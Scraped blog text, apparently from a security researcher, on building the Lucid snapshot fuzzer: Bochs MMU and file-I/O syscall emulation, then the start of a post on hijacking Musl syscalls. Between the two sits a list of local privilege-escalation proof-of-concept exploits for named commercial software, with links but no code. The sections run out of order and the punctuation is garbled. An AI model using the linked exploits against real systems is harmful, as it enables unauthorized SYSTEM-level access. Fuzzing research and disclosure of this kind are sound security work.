This was enough to get the Bochs binary I wanted to begin testing with. In the future we will likely need to change this configuration file, but for now this works. The repository should have more detailed build instructions and also will include already built Bochs binary.
Implementing a Simple MMU
Now that we are loading and executing Bochs and sandboxing it from syscalls, there are several new syscalls that we need to implement such as brk
, mmap
, and munmap
. Our test program was very simple and we hadnβt come across these syscalls yet.
These three syscalls all manipulate memory in some way, so I decided that we needed to implement some sort of Memory-Manager (MMU). To keep things as simple as possible, I decided that, at least for now, we will not be worrying about freeing memory, re-using memory, or unmapping memory. We will simply pre-allocate a pool of memory for both brk
calls to use and mmap
calls to use, so two pre-allocated pools of memory. We can also just hang the MMU structure off of the execution context so that we always have access to it during syscalls and context-switches.
So far, Bochs really only cares to map memory in that is READ/WRITE, so that works in our favor in terms of simplicity. So to pre-allocate the memory pools, we just do a fairly large mmap
call ourselves when we set up the MMU
as part of the execution context initialization routine:
// Structure to track memory usage in Bochs
#[derive(Clone)]
pub struct Mmu {
pub brk_base: usize, // Base address of brk region, never changes
pub brk_size: usize, // Size of the program break region
pub curr_brk: usize, // The current program break
pub mmap_base: usize, // Base address of the `mmap` pool
pub mmap_size: usize, // Size of the `mmap` pool
pub curr_mmap: usize, // The current `mmap` page base
pub next_mmap: usize, // The next allocation base address
}
impl Mmu {
pub fn new() -> Result<Self, LucidErr> {
// We don't care where it's mapped
let addr = std::ptr::null_mut::<libc::c_void>();
// Straight-forward
let length = (DEFAULT_BRK_SIZE + DEFAULT_MMAP_SIZE) as libc::size_t;
// This is normal
let prot = libc::PROT_WRITE | libc::PROT_READ;
// This might change at some point?
let flags = libc::MAP_ANONYMOUS | libc::MAP_PRIVATE;
// No file backing
let fd = -1 as libc::c_int;
// No offset
let offset = 0 as libc::off_t;
// Try to `mmap` this block
let result = unsafe {
libc::mmap(
addr,
length,
prot,
flags,
fd,
offset
)
};
if result == libc::MAP_FAILED {
return Err(LucidErr::from("Failed `mmap` memory for MMU"));
}
// Create MMU
Ok(Mmu {
brk_base: result as usize,
brk_size: DEFAULT_BRK_SIZE,
curr_brk: result as usize,
mmap_base: result as usize + DEFAULT_BRK_SIZE,
mmap_size: DEFAULT_MMAP_SIZE,
curr_mmap: result as usize + DEFAULT_BRK_SIZE,
next_mmap: result as usize + DEFAULT_BRK_SIZE,
})
}
Handling memory-management syscalls actually wasnβt too difficult, there were some gotchaβs early on but we managed to get something working fairly quickly.
Handling brk
brk is a syscall used to increase the size of the data segment in your program. So a typical pattern youβll see is that the program will call brk(0)
, which will return the current program break address, and then if the program wants 2 pages of extra memory, it will then call brk(base + 0x2000)
, and you can see that in the Bochs strace
output:
[devbox:~/bochs/bochs-2.7]$ strace ./bochs
execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0) = 289704
brk(NULL) = 0x555555d7c000
brk(0x555555d7e000) = 0x555555d7e000
So in our syscall handler, I have the following logic for brk
:
// brk
0xC => {
// Try to update the program break
if context.mmu.update_brk(a1).is_err() {
fault!(contextp, Fault::InvalidBrk);
}
// Return the program break
context.mmu.curr_brk as u64
},
This is effectively a wrapper around the update_brk
method weβve implemented for Mmu
, so letβs look at that:
// Logic for handling a `brk` syscall
pub fn update_brk(&mut self, addr: usize) -> Result<(), ()> {
// If addr is NULL, just return nothing to do
if addr == 0 { return Ok(()); }
// Check to see that the new address is in a valid range
let limit = self.brk_base + self.brk_size;
if !(self.curr_brk..limit).contains(&addr) { return Err(()); }
// So we have a valid program break address, update the current break
self.curr_brk = addr;
Ok(())
}
So if we get a NULL argument in a1
, we have nothing to do, nothing in the current MMU state needs adjusting, we just simply return the current program break. If we get a non-NULL argument, we do a sanity check to make sure that our pool of brk
memory is large enough to accomodate the request and if it is, we adjust the current program break and return that to the caller.
Remember, this is so simple because weβve already pre-allocated all of the memory, so we donβt need to actually do much here besides adjust what amounts to an offset indicating what memory is valid.
Handling mmap
and munmap
mmap is a bit more involved, but still easy to track through. For mmap
calls, theres more state we need to track because there are essentially βallocationsβ taking place that we need to keep in mind. Most mmap
calls will have a NULL argument for address because they donβt care where the memory mapping takes place in virtual memory, in that case, we default to our main method do_mmap
that weβve implemented for Mmu
:
// If a1 is NULL, we just do a normal mmap
if a1 == 0 {
if context.mmu.do_mmap(a2, a3, a4, a5, a6).is_err() {
fault!(contextp, Fault::InvalidMmap);
}
// Succesful regular mmap
return context.mmu.curr_mmap as u64;
}
// Logic for handling a `mmap` syscall with no fixed address support
pub fn do_mmap(
&mut self,
len: usize,
prot: usize,
flags: usize,
fd: usize,
offset: usize
) -> Result<(), ()> {
// Page-align the len
let len = (len + PAGE_SIZE - 1) & !(PAGE_SIZE - 1);
// Make sure we have capacity left to satisfy this request
if len + self.next_mmap > self.mmap_base + self.mmap_size {
return Err(());
}
// Sanity-check that we don't have any weird `mmap` arguments
if prot as i32 != libc::PROT_READ | libc::PROT_WRITE {
return Err(())
}
if flags as i32 != libc::MAP_PRIVATE | libc::MAP_ANONYMOUS {
return Err(())
}
if fd as i64 != -1 {
return Err(())
}
if offset != 0 {
return Err(())
}
// Set current to next, and set next to current + len
self.curr_mmap = self.next_mmap;
self.next_mmap = self.curr_mmap + len;
// curr_mmap now represents the base of the new requested allocation
Ok(())
}
Very simply, we do some sanity checks to make sure we have enough capacity to satisfy the allocation in our mmap
memory pool, we check to make sure the other arguments are what weβre anticipating, and then we simply update the current offset and the next offset. This way we know next time where to allocate from while also being able to return the current allocation base back to the caller.
There is also a case where mmap
will be called with a non-NULL address and MAP_FIXED
flags meaning that the address matters to the caller and the mapping should take place at the provided virtual address. Right now, this occurs early on in the Bochs process:
[devbox:~/bochs/bochs-2.7]$ strace ./bochs
execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0) = 289704
brk(NULL) = 0x555555d7c000
brk(0x555555d7e000) = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000
For this special case, there is really nothing for us to do since that address is in the brk
pool. We already know about that memory, weβve already created it, so this last mmap
call you see above amounts to a NOP for us, there is nothing to do but return the address back to the caller.
At this time, we donβt support MAP_FIXED
calls for non-brk pool memory.
For munmap
, we also treat this operation as a NOP and return success to the user because weβre not concerned with freeing or re-using memory at this time.
You can see that Bochs does quite a bit of brk
and mmap
calls and our fuzzer is now capable of handling them all via our MMU:
...
brk(NULL) = 0x555555d7c000
brk(0x555555d7e000) = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bde000
mmap(NULL, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bda000
mmap(NULL, 4194324, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd06f7ff000
mmap(NULL, 73728, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbe000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbd000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbc000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
munmap(0x7fd071bbb000, 4096) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bba000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb9000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb8000
brk(0x555555d7f000) = 0x555555d7f000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
munmap(0x7fd071bb5000, 4096) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb0000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baf000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bad000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bab000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baa000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
munmap(0x7fd071ba5000, 4096) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba3000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9e000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9d000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9b000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
munmap(0x7fd071b99000, 8192) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b97000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b96000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
munmap(0x7fd071b94000, 8192) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
...
File I/O
With the MMU out of the way, we needed a way to do file input and output. Bochs is trying to open its configuration file:
open(".bochsrc", O_RDONLY|O_LARGEFILE) = 3
close(3) = 0
writev(2, [{iov_base="00000000000i[ ] ", iov_len=21}, {iov_base=NULL, iov_len=0}], 200000000000i[ ] ) = 21
writev(2, [{iov_base="reading configuration from .boch"..., iov_len=36}, {iov_base=NULL, iov_len=0}], 2reading configuration from .bochsrc
) = 36
open(".bochsrc", O_RDONLY|O_LARGEFILE) = 3
read(3, "# You may now use double quotes "..., 1024) = 1024
read(3, "================================"..., 1024) = 1024
read(3, "ig_interface: win32config\n#confi"..., 1024) = 1024
read(3, "ace to AT&T's VNC viewer, cross "..., 1024) = 1024
The way Iβve approached this for now is to pre-read and store the contents of required files in memory when I initialize the Bochs execution context. This has some advantages, because I can imagine a future when weβre fuzzing something and Bochs needs to do file I/O on a disk image file or something else, and itβd be nice to just already have that file read into memory and waiting for usage. Emulating the file I/O syscalls then becomes very straightforward, we really only need to keep a few metadata and the file contents themselves:
#[derive(Clone)]
pub struct FileTable {
files: Vec<File>,
}
impl FileTable {
// We will attempt to open and read all of our required files ahead of time
pub fn new() -> Result<Self, LucidErr> {
// Retrieve .bochsrc
let args: Vec<String> = std::env::args().collect();
// Check to see if we have a "--bochsrc-path" argument
if args.len() < 3 || !args.contains(&"--bochsrc-path".to_string()) {
return Err(LucidErr::from("No `--bochsrc-path` argument"));
}
// Search for the value
let mut bochsrc = None;
for (i, arg) in args.iter().enumerate() {
if arg == "--bochsrc-path" {
if i >= args.len() - 1 {
return Err(
LucidErr::from("Invalid `--bochsrc-path` value"));
}
bochsrc = Some(args[i + 1].clone());
break;
}
}
if bochsrc.is_none() { return Err(
LucidErr::from("No `--bochsrc-path` value provided")); }
let bochsrc = bochsrc.unwrap();
// Try to read the file
let Ok(data) = read(&bochsrc) else {
return Err(LucidErr::from(
&format!("Unable to read data BLEGH from '{}'", bochsrc)));
};
// Create a file now for .bochsrc
let bochsrc_file = File {
fd: 3,
path: ".bochsrc".to_string(),
contents: data.clone(),
cursor: 0,
};
// Insert the file into the FileTable
Ok(FileTable {
files: vec![bochsrc_file],
})
}
// Attempt to open a file
pub fn open(&mut self, path: &str) -> Result<i32, ()> {
// Try to find the requested path
for file in self.files.iter() {
if file.path == path {
return Ok(file.fd);
}
}
// We didn't find the file, this really should never happen?
Err(())
}
// Look a file up by fd and then return a mutable reference to it
pub fn get_file(&mut self, fd: i32) -> Option<&mut File> {
self.files.iter_mut().find(|file| file.fd == fd)
}
}
#[derive(Clone)]
pub struct File {
pub fd: i32, // The file-descriptor Bochs has for this file
pub path: String, // The file-path for this file
pub contents: Vec<u8>, // The actual file contents
pub cursor: usize, // The current cursor in the file
}
So when Bochs asks to read
a file and provides the fd
, we just check the FileTable
for the correct file and then read its contents from the File::contents
buffer and then update the cursor
struct member to keep track of where in the file our current offset is.
// read
0x0 => {
// Check to make sure we have the requested file-descriptor
let Some(file) = context.files.get_file(a1 as i32) else {
println!("Non-existent file fd: {}", a1);
fault!(contextp, Fault::NoFile);
};
// Now we need to make sure the buffer passed to read isn't NULL
let buf_p = a2 as *mut u8;
if buf_p.is_null() {
context.tls.errno = libc::EINVAL;
return -1_i64 as u64;
}
// Adjust read size if necessary
let length = std::cmp::min(a3, file.contents.len() - file.cursor);
// Copy the contents over to the buffer
unsafe {
std::ptr::copy(
file.contents.as_ptr().add(file.cursor), // src
buf_p, // dst
length); // len
}
// Adjust the file cursor
file.cursor += length;
// Success
length as u64
},
open
calls are basically just handled as sanity checks at this point to make sure we know what Bochs is trying to access:
// open
0x2 => {
// Get pointer to path string we're trying to open
let path_p = a1 as *const libc::c_char;
// Make sure it's not NULL
if path_p.is_null() {
fault!(contextp, Fault::NullPath);
}
// Create c_str from pointer
let c_str = unsafe { std::ffi::CStr::from_ptr(path_p) };
// Create Rust str from c_str
let Ok(path_str) = c_str.to_str() else {
fault!(contextp, Fault::InvalidPathStr);
};
// Validate permissions
if a2 as i32 != 32768 {
println!("Unhandled file permissions: {}", a2);
fault!(contextp, Fault::Syscall);
}
// Open the file
let fd = context.files.open(path_str);
if fd.is_err() {
println!("Non-existent file path: {}", path_str);
fault!(contextp, Fault::NoFile);
}
// Success
fd.unwrap() as u64
},
// Attempt to open a file
pub fn open(&mut self, path: &str) -> Result<i32, ()> {
// Try to find the requested path
for file in self.files.iter() {
if file.path == path {
return Ok(file.fd);
}
}
// We didn't find the file
Err(())
}
And thatβs really the whole of file I/O right now. Down the line, weβll need to keep these in mind when weβre doing snapshots and resetting snapshots because the file state will need to be restored differentially, but this is a problem for another day.
Conclusion
The work continues on the fuzzer, Iβm still having a blast implementing it, special thanks to everyone mentioned in the repository for their help! Next, weβll have to pick a fuzzing target and it get it running in Bochs. Weβll have to lobotomize the system Bochs is emulating so that it runs our target program such that we can snapshot and fuzz appropriately, that should be really fun, until then!
CVE-2023-7016-POC
POC for the flaw in Thales SafeNet Authentication Client prior to 10.8 R10 on Windows that allows an attacker to execute code at a SYSTEM level via local access.
https://github.com/ewilded/CVE-2023-7016-POC
CVE-2024-0197-POC
Proof of concept for Local Privilege Escalation in Thales Sentinel HASP LDK.
CVE-2023-38041 POC
Ivanti Pulse Secure Client Connect Local Privilege Escalation CVE-2023-38041 Proof of Concept: https://github.com/ewilded/CVE-2023-38041-POC (there's two versions, one highly accurate due to use of oplocks and directory junctions, and one - less accurate - but with oplocks only).
CVE-2024-25376 POC
CVE-2024-25376 - Local Privilege Escalation in TUSBAudio POC (driver installers after v5.40.0 and before v5.68.0 are affected). Reference: https://www.thesycon.de/eng/usb_audiodriver.shtml#SecurityAdvisory
Fuzzer Development 2: Sandboxing Syscalls
Introduction
If you havenβt heard, weβre developing a fuzzer on the blog these days. I donβt even know if βfuzzerβ is the right word for what weβre building, itβs almost more like an execution engine that will expose hooks? Anyways, if you missed the first episode you can catch up here. We are creating a fuzzer that loads a statically built Bochs emulator into itself, and executes Bochs logic while maintaining a sandbox for Bochs. You can think of it as, we were too lazy to implement our own x86_64 emulator from scratch so weβve just literally taken a complete emulator and stuffed it into our own process to use it. The fuzzer is written in Rust and Bochs is a C++ codebase. Bochs is a full system emulator, so the devices and everything else is just simulated in software. This is great for us because we can simply snapshot and restore Bochs itself to achieve snapshot fuzzing of our target. So the fuzzer runs Bochs and Bochs runs our target. This allows us to snapshot fuzz arbitrarily complex targets: web browsers, kernels, network stacks, etc. This episode, weβll delve into the concept of sandboxing Bochs from syscalls. We do not want Bochs to be capable of escaping its sandbox or retrieving any data from outside of our environment. So today weβll get into the implementation details of my first stab at Bochs-to-fuzzer context switching to handle syscalls. In the future we will also need to implement context switching from fuzzer-to-Bochs as well, but for now letβs focus on syscalls.
This fuzzer was conceived of and implemented originally by Brandon Falk.
There will be no repo changes with this post.
Syscalls
Syscalls are a way for userland to voluntarily context switch to kernel-mode in order to utilize some kernel provided utility or function. Context switching simply means changing the context in which code is executing. When youβre adding integers, reading/writing memory, your process is executing in user-mode within your processesβ virtual address space. But if you want to open a socket or file, you need the kernelβs help. To do this, you make a syscall which will tell the processor to switch execution modes from user-mode to kernel-mode. In order to leave user-mode go to kernel-mode and then return to user-mode, a lot of care must be taken to accurately save the execution state at every step. Once you try to execute a syscall, the first thing the OS has to do is save your current execution state before it starts executing your requested kernel code, that way once the kernel is done with your request, it can return gracefully to executing your user-mode process.
Context-switching can be thought of as switching from executing one process to another. In our case, weβre switching from Bochs execution to Lucid execution. Bochs is doing itβs thing, reading/writing memory, doing arithmetic etc, but when it needs the kernelβs help it attempts to make a syscall. When this occurs we need to:
- recognize that Bochs is trying to syscall, this isnβt always easy to do weirdly
- intercept execution and redirect to the appropriate code path
- save Bochsβ execution state
- execute our Lucid logic in place of the kernel, think of Lucid as Bochsβ kernel
- return gracefully to Bochs by restoring its state
C Library
Normally programmers donβt have to worry about making syscalls directly. They instead use functions that are defined and implemented in a C library instead, and its these functions that actually make the syscalls. You can think of these functions as wrappers around a syscall. For instance if you use the C library function for open
, youβre not directly making a syscall, youβre calling into the libraryβs open
function and that function is the one emitting a syscall
instruction that actually peforms the context switch into the kernel. Doing things this way takes a lot of the portability work off of the programmerβs shoulders because the guts of the library functions perform all of the conditional checks for environmental variables and execute accordingly. Programmers just call the open
function and donβt have to worry about things like syscall numbers, error handling, etc as those things are kept abstracted and uniform in the code exported to the programmer.
This provides a nice chokepoint for our purposes, since Bochs programmers also use C library functions instead of invoking syscalls directly. When Bochs wants to make a syscall, itβs going to call a C library function. This gives us an opportunity to intercept these syscalls before they are made. We can insert our own logic into these functions that check to see whether or not Bochs is executing under Lucid, if it is, we can insert logic that directs execution to Lucid instead of the kernel. In pseudocode we can achieve something like the following:
fn syscall()
if lucid:
lucid_syscall()
else:
normal_syscall()
Musl
Musl is a C library that is meant to be βlightweight.β This gives us some simplicity to work with vs. something like Glibc which is a monstrosity an affront to God. Importantly, Musl is reputationally great for static linking, which is what we need when we build our static PIE Bochs. So the idea here is that we can manually alter Musl code to change how syscall-invoking wrapper functions work so that we can hijack execution in a way that context-switches into Lucid rather than the kernel.
In this post weβll be working with Musl 1.2.4 which is the latest version as of today.
Baby Steps
Instead of jumping straight into Bochs, weβll be using a test program for the purposes of developing our first context-switching routines. This is just easier. The test program is this:
#include <stdio.h>
#include <unistd.h>
#include <lucid.h>
int main(int argc, char *argv[]) {
printf("Argument count: %d\n", argc);
printf("Args:\n");
for (int i = 0; i < argc; i++) {
printf(" -%s\n", argv[i]);
}
size_t iters = 0;
while (1) {
printf("Test alive!\n");
sleep(1);
iters++;
if (iters == 5) { break; }
}
printf("g_lucid_ctx: %p\n", g_lucid_ctx);
}
The program will just tell us itβs argument count, each argument, live for ~5 seconds, and then print the memory address of a Lucid execution context data structure. This data structure will be allocated and initialized by Lucid if the program is running under Lucid, and it will be NULL otherwise. So how do we accomplish this?
Execution Context Tracking
Our problem is that we need a globally accessible way for the program we load (eventually Bochs) to tell whether or not its running under Lucid or running as normal. We also have to provide many data structures and function addresses to Bochs so we need a vehicle do that.
What Iβve done is Iβve just created my own header file and placed it in Musl called lucid.h
. This file defines all of the Lucid-specific data structures we need Bochs to have access to when itβs compiled against Musl. So in the header file right now weβve defined a lucid_ctx
data structure, and weβve also created a global instance of one called g_lucid_ctx
:
// An execution context definition that we use to switch contexts between the
// fuzzer and Bochs. This should contain all of the information we need to track
// all of the mutable state between snapshots that we need such as file data.
// This has to be consistent with LucidContext in context.rs
typedef struct lucid_ctx {
// This must always be the first member of this struct
size_t exit_handler;
int save_inst;
size_t save_size;
size_t lucid_save_area;
size_t bochs_save_area;
struct register_bank register_bank;
size_t magic;
} lucid_ctx_t;
// Pointer to the global execution context, if running inside Lucid, this will
// point to the a struct lucid_ctx_t inside the Fuzzer
lucid_ctx_t *g_lucid_ctx;
Program Start Under Lucid
So in Lucidβs main function right now we do the following:
- Load Bochs
- Create an execution context
- Jump to Bochsβ entry point and start executing
When we jump to Bochsβ entry point, one of the earliest functions called is a function in Musl called _dlstart_c
located in the source file dlstart.c
. Right now, we create that global execution context in Lucid on the heap, and then we pass that address in arbitrarily chosen r15
. This whole function will have to change eventually because weβll want to context switch from Lucid to Bochs to perform this in the future, but for now this is all we do:
pub fn start_bochs(bochs: Bochs, context: Box<LucidContext>) {
// rdx: we have to clear this register as the ABI specifies that exit
// hooks are set when rdx is non-null at program start
//
// rax: arbitrarily used as a jump target to the program entry
//
// rsp: Rust does not allow you to use 'rsp' explicitly with in(), so we
// have to manually set it with a `mov`
//
// r15: holds a pointer to the execution context, if this value is non-
// null, then Bochs learns at start time that it is running under Lucid
//
// We don't really care about execution order as long as we specify clobbers
// with out/lateout, that way the compiler doesn't allocate a register we
// then immediately clobber
unsafe {
asm!(
"xor rdx, rdx",
"mov rsp, {0}",
"mov r15, {1}",
"jmp rax",
in(reg) bochs.rsp,
in(reg) Box::into_raw(context),
in("rax") bochs.entry,
lateout("rax") _, // Clobber (inout so no conflict with in)
out("rdx") _, // Clobber
out("r15") _, // Clobber
);
}
}
So when we jump to Bochs entry point having come from Lucid, r15
should hold the address of the execution context. In _dlstart_c
, we can check r15
and act accordingly. Here are those additions I made to Muslβs start routine:
hidden void _dlstart_c(size_t *sp, size_t *dynv)
{
// The start routine is handled in inline assembly in arch/x86_64/crt_arch.h
// so we can just do this here. That function logic clobbers only a few
// registers, so we can have the Lucid loader pass the address of the
// Lucid context in r15, this is obviously not the cleanest solution but
// it works for our purposes
size_t r15;
__asm__ __volatile__(
"mov %%r15, %0" : "=r"(r15)
);
// If r15 was not 0, set the global context address for the g_lucid_ctx that
// is in the Rust fuzzer
if (r15 != 0) {
g_lucid_ctx = (lucid_ctx_t *)r15;
// We have to make sure this is true, we rely on this
if ((void *)g_lucid_ctx != (void *)&g_lucid_ctx->exit_handler) {
__asm__ __volatile__("int3");
}
}
// We didn't get a g_lucid_ctx, so we can just run normally
else {
g_lucid_ctx = (lucid_ctx_t *)0;
}
When this function is called, r15
remains untouched by the earliest Musl logic. So we use inline assembly to extract the value into a variable called r15
and check it for data. If it has data, we set the global context variable to the address in r15
; otherwise we explicitly set it to NULL and run as normal. Now with a global set, we can do runtime checks for our environment and optionally call into the real kernel or into Lucid.
Lobotomizing Musl Syscalls
Now with our global set, itβs time to edit the functions responsible for making syscalls. Musl is very well organized so finding the syscall invoking logic was not too difficult. For our target architecture, which is x86_64, those syscall invoking functions are in arch/x86_64/syscall_arch.h
. They are organized by how many arguments the syscall takes:
static __inline long __syscall0(long n)
{
unsigned long ret;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n) : "rcx", "r11", "memory");
return ret;
}
static __inline long __syscall1(long n, long a1)
{
unsigned long ret;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1) : "rcx", "r11", "memory");
return ret;
}
static __inline long __syscall2(long n, long a1, long a2)
{
unsigned long ret;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2)
: "rcx", "r11", "memory");
return ret;
}
static __inline long __syscall3(long n, long a1, long a2, long a3)
{
unsigned long ret;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
"d"(a3) : "rcx", "r11", "memory");
return ret;
}
static __inline long __syscall4(long n, long a1, long a2, long a3, long a4)
{
unsigned long ret;
register long r10 __asm__("r10") = a4;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
"d"(a3), "r"(r10): "rcx", "r11", "memory");
return ret;
}
static __inline long __syscall5(long n, long a1, long a2, long a3, long a4, long a5)
{
unsigned long ret;
register long r10 __asm__("r10") = a4;
register long r8 __asm__("r8") = a5;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
"d"(a3), "r"(r10), "r"(r8) : "rcx", "r11", "memory");
return ret;
}
static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
unsigned long ret;
register long r10 __asm__("r10") = a4;
register long r8 __asm__("r8") = a5;
register long r9 __asm__("r9") = a6;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
"d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
return ret;
}
